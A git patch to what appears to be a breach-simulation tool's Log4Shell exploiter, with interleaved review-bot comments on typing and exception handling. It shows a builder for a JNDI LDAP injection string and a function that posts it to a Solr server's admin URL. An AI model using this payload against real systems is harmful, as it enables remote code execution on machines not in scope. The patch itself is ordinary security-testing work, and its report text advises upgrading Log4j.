From 51bf553fb5c1873782ec016273825d44319c3f12 Mon Sep 17 00:00:00 2001
From: Ilija Lazoroski
Date: Mon, 17 Jan 2022 16:37:03 +0100
Subject: [PATCH] Agent, Island: Minor changes to Log4Shell Return types, removing logging from solr service and change Log4j to Log4Shell in Island reporting
---
 monkey/infection_monkey/exploit/log4shell.py | 4 ++--
 .../exploit/log4shell_utils/service_exploiters/solr.py | 2 --
 .../exploit_processing/exploiter_descriptor_enum.py | 2 +-
 .../report-components/security/issues/Log4ShellIssue.js | 8 ++++----
 4 files changed, 7 insertions(+), 9 deletions(-)
diff --git a/monkey/infection_monkey/exploit/log4shell.py b/monkey/infection_monkey/exploit/log4shell.py
index 80a3cbb6e..d33b7d0bd 100644
--- a/monkey/infection_monkey/exploit/log4shell.py
+++ b/monkey/infection_monkey/exploit/log4shell.py
@@ -116,12 +116,12 @@ class Log4ShellExploiter(WebRCE):
 self._ldap_server.stop(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
- def _build_ldap_payload(self):
+ def _build_ldap_payload(self) -> str:
 interface_ip = get_interface_to_target(self.host.ip_addr)
 return f"${{jndi:ldap://{interface_ip}:{self._ldap_port}/dn=Exploit}}"
 # TODO remove duplication with infection_monkey.exploit.hadoop.HadoopExploiter.build_command
- def _build_command(self, path, http_path):
+ def _build_command(self, path, http_path) -> str:
 # Build command to execute
 monkey_cmd = build_monkey_commandline(
 self.host, get_monkey_depth() - 1, vulnerable_port=None, location=path
diff --git a/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/solr.py b/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/solr.py
index 7bdc3fb42..930c6092c 100644
--- a/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/solr.py
+++ b/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/solr.py
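Review bot: The new `-> str` on `_build_command` leaves `path` and `http_path` unannotated, so the signature is now only half typed; if both are path strings (they look like it, with `path` fed to `build_monkey_commandline(..., location=path)`, but confirm against the caller) the consistent form is `def _build_command(self, path: str, http_path: str) -> str:`, matching the fully annotated `trigger_exploit(payload: str, host: VictimHost, port: int)` later in this patch. `_build_ldap_payload` also gains a return type but still has no docstring, and the string it builds is the heart of the exploit; a one-liner such as `"""Return the JNDI lookup string that makes the target's Log4j contact this agent's LDAP server at interface_ip:self._ldap_port."""` would tell the next reader why the interface address and `_ldap_port` are baked into it. The body of `_build_command` continues past the end of this hunk, so only its signature is reviewed here.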
@@ -15,8 +15,6 @@ class SolrExploit(IServiceExploiter):
 def trigger_exploit(payload: str, host: VictimHost, port: int):
 url = f"http://{host.ip_addr}:{port}/solr/admin/cores?fu={payload}"
 try:
- logger.debug("Sending malicious SOLR log4j request")
 requests.post(url, timeout=5, verify=False) # noqa DUO123
- logger.debug("Request sent")
 except requests.ReadTimeout as e:
 logger.debug(f"Log4shell request failed {e}")
diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py
index bb63e3cb9..2bce985d5 100644
--- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py
+++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py
@@ -55,7 +55,7 @@ class ExploiterDescriptorEnum(Enum):
 POWERSHELL = ExploiterDescriptor(
 "PowerShellExploiter", "PowerShell Remoting Exploiter", ExploitProcessor
 )
- LOG4SHELL = ExploiterDescriptor("Log4ShellExploiter", "Log4j Exploiter", Log4ShellProcessor)
+ LOG4SHELL = ExploiterDescriptor("Log4ShellExploiter", "Log4Shell Exploiter", Log4ShellProcessor)
 @staticmethod
 def get_by_class_name(class_name: str) -> ExploiterDescriptor:
diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/Log4ShellIssue.js b/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/Log4ShellIssue.js
index e9642d71e..4c1bffb39 100644
--- a/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/Log4ShellIssue.js
+++ b/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/Log4ShellIssue.js
@@ -2,19 +2,19 @@ import React from 'react';
 import CollapsibleWellComponent from '../CollapsibleWell';
 export function log4shellIssueOverview() {
- return (
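Review bot: With the two debug lines removed, `requests.post(...)` is the only statement left inside the `try`, yet the `except` still catches only `requests.ReadTimeout`; a refused port, a DNS failure or a connect-phase timeout (`requests.ConnectionError` / `requests.ConnectTimeout`) would propagate out of `trigger_exploit` instead of being logged the way a read timeout is. Unless the caller is known to wrap every service exploiter in its own handler, `except requests.RequestException as e:` keeps the trigger best-effort for all transport failures while still logging the cause. A short comment on the `url` line, e.g. `# payload lands in Solr's request log via the unused 'fu' query parameter; requests percent-encodes it on the wire`, would also record why an arbitrary parameter name is used, since the removal of the "Sending malicious SOLR log4j request" log leaves no other hint. The line preceding `def trigger_exploit` (presumably its decorator, given the absence of `self`) lies outside the hunk.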
  • Some servers are vulnerable to log4shell remote code execution exploit.
  • ) + return (
  • Some servers are vulnerable to the Log4Shell remote code execution exploit.
  • ) } export function log4shellIssueReport(issue) { return ( <> - Upgrade the log4j component to version 2.15.0 or later. + Upgrade the Apache Log4j component to version 2.15.0 or later. The {issue.service} server {issue.machine} ({issue.ip_address}:{issue.port}) is vulnerable to log4shell remote code execution attack. + className="badge badge-danger">the Log4Shell remote code execution attack.
    - The attack was made possible due to an old version of log4j component. + The attack was made possible due to an old version of Apache Log4j component.
    );